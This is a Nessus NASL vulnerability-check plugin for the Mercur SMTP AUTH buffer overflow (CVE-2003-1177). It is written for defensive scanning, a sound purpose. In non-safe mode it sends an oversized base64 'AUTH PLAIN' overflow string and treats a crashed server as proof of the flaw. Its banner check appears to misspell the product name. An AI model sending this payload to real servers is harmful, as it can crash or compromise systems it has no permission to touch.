#
# (C) Tenable Network Security
#

if(description)
{
 script_id(11910);
 script_cve_id("CVE-2003-1177");
 script_bugtraq_id(8861, 8889);
 script_version("$Revision: 1.9 $");
# if(defined_func("script_xref"))script_xref(name:"IAVA", value:"2003-A-");

 name["english"] = "Mercur SMTP server AUTH overflow";

 script_name(english:name["english"]);

 desc["english"] = "
Synopsis :

The remote mail server is prone to a buffer overflow attack.

Description :

The remote Atrium Mercur SMTP server (mail server) seems to be
vulnerable to a remote buffer overflow.  Successful exploitation of
this vulnerability would give a remote attacker administrative access
to the mail server and access to potentially confidential data. 

See also : 

http://archives.neohapsis.com/archives/fulldisclosure/2003-q4/1459.html
http://www.atrium-software.com/mercur/mercur_e.html 

Solution : 

Upgrade to MERCUR Mailserver 4.2 SP3a or later.

Risk factor : 

Critical / CVSS Base Score : 10.0
(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)";
 script_description(english:desc["english"]);

 summary["english"] = "Checks for the Mercur remote buffer overflow";

 script_summary(english:summary["english"]);

 script_category(ACT_MIXED_ATTACK);


 script_copyright(english:"This script is Copyright (C) 2003-2007 Tenable Network Security");
 family["english"] = "Gain root remotely";
 script_family(english:family["english"]);
 script_dependencie("find_service1.nasl");
 script_require_ports("Services/smtp", 25);
 exit(0);
}


# start script code

include("smtp_func.inc");


port = get_kb_item("Services/smtp");
if(!port)port = 25;
if (!get_port_state(port)) exit(0);


if ( safe_checks() )
{
 banner = get_smtp_banner(port:port);
 if ( ! banner ) exit(0);

 if(egrep(pattern:"^220.*MERCUR SMTP-Server .v([0-3]\.|4\.0?([01]\.|2\.0))",
	  string:banner))security_hole(port);
 exit(0);
}

# this test string provided by
# Kostya KORTCHINSKY on FD mailing list at netsys

req = string("AUTH PLAIN kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ");


banner = get_smtp_banner(port:port);
if ("MERCURE SMTP-Server" >!< banner)
  exit (0);

soc=open_sock_tcp(port);
if (!soc) exit(0);
send (socket:soc, data:req);     
close(soc);
soc = open_sock_tcp(port);
if (!soc) security_hole(port);
exit(0);












